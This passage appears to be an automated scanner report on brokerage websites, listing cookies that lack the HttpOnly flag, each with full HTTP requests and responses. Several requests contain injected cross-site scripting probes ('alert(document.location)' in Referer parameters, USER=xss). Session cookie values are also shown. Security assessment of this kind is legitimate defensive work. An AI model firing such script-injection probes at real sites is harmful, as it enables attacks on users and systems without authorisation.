        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0
...[SNIP]...

10.6. https://www.interactivebrokers.com/sso/Authenticator

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /sso/Authenticator

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /sso/Authenticator?91146 HTTP/1.1
Host: www.interactivebrokers.com
Connection: keep-alive
Referer: https://www.interactivebrokers.com/sso/Login
Content-Length: 339
Origin: https://www.interactivebrokers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B63C36F91C020C4B017188CC1EF896E3.wwwsso3; ib=googlead; web=1059282; XYZAB_AM.LOGIN=; XYZAB=; URL_PARAM=actiongetProps=getProps&language=en&propFile=SSO_Login_v1

ACTION=COMPLETEAUTH&USER=xss&ACCT=&M1=4529e29cf6687577dfafe2960e6747bca9c1f0a2&EKX=1d7627dc32b950b32219f748085f166dc9960f2583a1519b88576a5b65b72bfe92fad39bbe74759b23095a7e6b86699d2a9ea954f0468f59ce872
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:53:07 GMT
Server: Apache
Set-Cookie: JSESSIONID=1BA8E2DE88E2128104867CFC6671D3E8.wwwsso3; Path=/sso; Secure
Content-Length: 70
Connection: close
Content-Type: text/xml

<ib_auth_res>
<ini_params>
<M2>null</M2>
</ini_params>
</ib_auth_res>

10.7. https://www.interactivebrokers.com/sso/Login

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /sso/Login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: XYZAB_AM.LOGIN, XYZAB, URL_PARAM, JSESSIONID. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sso/Login?forwardTo=1 HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:49:03 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: XYZAB_AM.LOGIN=; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: XYZAB=; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: URL_PARAM=forwardTo=1; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: JSESSIONID=6CABFA1224B746F03649A64DE5E8609E.wwwsso3; Path=/sso; Secure
Content-Length: 13244
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
   <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"/>
   <link hre
...[SNIP]...

10.8. https://www.optionsxpress.com/new_account.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.optionsxpress.com
Path:   /new_account.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ASPSESSIONIDSAASBSDA. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new_account.asp?intcmp=lp_sales_futures HTTP/1.1
Host: www.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; CMPID=gsus23305007; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; TLTHID=3DAC4327436FC1E882AB69BF2C12F5CC; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007

Response

HTTP/1.1 302 Object moved
Date: Thu, 08 Sep 2011 19:45:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
Content-Length: 208
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:45:33 GMT
Set-Cookie: ASPSESSIONIDSAASBSDA=IICGFGHAGIOCHNMHCMJLCMKM; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&amp;firm=OX">here</a>.
...[SNIP]...

10.9. https://www.optionsxpress.com/new_account.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.optionsxpress.com
Path:   /new_account.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ASPSESSIONIDQCDSCTCB. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new_account.asp?intcmp=lp_sales_futures HTTP/1.1
Host: www.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; CMPID=gsus23305007; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; TLTHID=3DAC4327436FC1E882AB69BF2C12F5CC; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007

Response

HTTP/1.1 302 Object moved
Date: Thu, 08 Sep 2011 19:25:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
Content-Length: 208
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:25:16 GMT
Set-Cookie: ASPSESSIONIDQCDSCTCB=DJOPBMDAGLGCJENDBNKKAEHI; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&amp;firm=OX">here</a>.
...[SNIP]...

10.10. https://www.optionsxpress.com/welcome.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.optionsxpress.com
Path:   /welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: ASPSESSIONIDCSTSAQDA, TLTHID, TLTCNT. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:46:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCSTSAQDA=EALHAKIANBNPKJOEIOKNNICO; path=/
Set-Cookie: TLTHID=23D6A57C4BE8F428BC3F1C97DD0273A0; Path=/; Domain=.optionsxpress.com
HostName: DAWEB25
Set-Cookie: TLTCNT=DAWEB250000000000012272
Date: Thu, 08 Sep 2011 19:46:54 GMT
Connection: close


10.11. http://360.sorensonmedia.com/7d285f50de540c4b64C9b74Y99dcc88d0ad6/embedv2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://360.sorensonmedia.com
Path:   /7d285f50de540c4b64C9b74Y99dcc88d0ad6/embedv2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: AWSELB. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /7d285f50de540c4b64C9b74Y99dcc88d0ad6/embedv2.js HTTP/1.1
Host: 360.sorensonmedia.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
cache-control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=utf-8
Date: Thu, 08 Sep 2011 19:24:43 GMT
pragma: no-cache
Server: nginx/0.5.33
Set-Cookie: AWSELB=7399391306302201EC8ED885C1DF301EBE94B9D3266A90D7C75A424550F489FD629C2C3ACAAE7C766E443396D53A4DBE988DB00D0CFDBC4B96568304D3BBF7D375BA252957;PATH=/;MAX-AGE=172800
Content-Length: 4402
Connection: keep-alive


var embedCode = "<object style='outline:none;' width='100%' height='100%' type='application/x-shockwave-flash' data='http://static.cdn.360.sorensonmedia.com/1/flash/flowplayer-3.2.2.swf' id='videoPla
...[SNIP]...

10.12. https://account.optionsxpress.com/OpenAccount/Index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Index

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OpenAccount/Index?intcmp=lp_sales_futures&firm=OX HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=7168044948469A60359581B20B826924

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 86733
Content-Type: text/html; charset=utf-8
Expires: Thu, 08 Sep 2011 19:25:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=8BDB9C054DE94B794A725090608A94A2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:20 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

</title><link rel="sty
...[SNIP]...

10.13. https://account.optionsxpress.com/OpenAccount/NewAccountAjax/GenericHandler

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/NewAccountAjax/GenericHandler

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OpenAccount/NewAccountAjax/GenericHandler?methodName=GetFirmFromCountry&parameters=1 HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=DAA835CC43F5D88C7C759C8916AE73EE; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

"OX"

10.14. https://account.optionsxpress.com/OpenAccount/Scripts/nap.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/nap.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, TLTSID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/nap.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 8210
Content-Type: text/css
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/nap.css
Last-Modified: Tue, 24 May 2011 16:44:37 GMT
Accept-Ranges: bytes
ETag: "80482bde311acc1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0CB5EB094D57EFBDD7F02D873075B0F6; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0CB5EB094D57EFBDD7F02D873075B0F6; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

*
{
margin: 0;
padding: 0; /*font:bold 12px "Lucida Grande", Arial, sans-serif; */
}

#columnContainerTwo,
#openAccount
...[SNIP]...

10.15. https://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/napgeneral.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, TLTSID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/napgeneral.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 69748
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js
Last-Modified: Tue, 10 May 2011 16:55:21 GMT
Accept-Ranges: bytes
ETag: "80623dc33fcc1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=763E378F444B9764FB516DBF60432013; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=763E378F444B9764FB516DBF60432013; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

10.16. https://account.optionsxpress.com/OpenAccount/Scripts/naponload.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/naponload.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, TLTSID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/naponload.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 12001
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/naponload.js
Last-Modified: Tue, 23 Nov 2010 14:53:52 GMT
Accept-Ranges: bytes
ETag: "040423e1e8bcb1:fc8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=E9AF2F6144A0120B1C2E90B8BF0628B1; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=E9AF2F6144A0120B1C2E90B8BF0628B1; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

10.17. https://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/napvalidate.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, TLTSID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/napvalidate.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 154727
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js
Last-Modified: Thu, 07 Apr 2011 17:11:23 GMT
Accept-Ranges: bytes
ETag: "802f1d246f5cb1:e65"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4489136141A3C546F157268319DC82E2; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=4489136141A3C546F157268319DC82E2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

10.18. https://account.optionsxpress.com/css/oxps.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /css/oxps.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, TLTSID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /css/oxps.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 66752
Content-Type: text/css
Last-Modified: Mon, 10 May 2010 20:56:05 GMT
Accept-Ranges: bytes
ETag: "b095c23483f0ca1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4DCE15C74DC6FFB53C82A6AF748A4ACA; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=4DCE15C74DC6FFB53C82A6AF748A4ACA; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

@import url("https://images.optionsxpress.com/css/reset.css");

html,body {
   background: #ffffff;
   background-image: url("https://images.optionsxpress.com/images/prelogin/ox_bg.jpg");
   margin: 0p
...[SNIP]...

10.19. https://account.optionsxpress.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=61F93426422DA13562D689B5022DBFC6

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Fri, 20 Mar 2009 15:16:36 GMT
Accept-Ranges: bytes
ETag: "062bdc6ea9c91:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F04D32D8484F69A30C544985DCE10F86; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:31 GMT

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

10.20. https://account.optionsxpress.com/images/btn_next_step.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/btn_next_step.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: TLTHID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_next_step.jpg HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 2414
Content-Type: image/jpeg
Last-Modified: Wed, 05 Nov 2008 18:29:43 GMT
Accept-Ranges: bytes
ETag: "805ab78743fc91:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A8232ADF480D39289D31E09763CACF10; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:27 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................@.X..
...[SNIP]...

10.21. https://account.optionsxpress.com/images/icon_arrow.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/icon_arrow.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, TLTSID. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icon_arrow.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 449
Content-Type: image/jpeg
Last-Modified: Thu, 10 Jul 2008 18:51:58 GMT
Accept-Ranges: bytes
ETag: "6027ab7bee2c81:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=40AC7ADE4E4FC6801AC62196A778AB08; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=40AC7ADE4E4FC6801AC62196A778AB08; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..............................................................................................................
...[SNIP]...

10.22. https://account.optionsxpress.com/images/icons/log_in.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/icons/log_in.gif

Issue detail

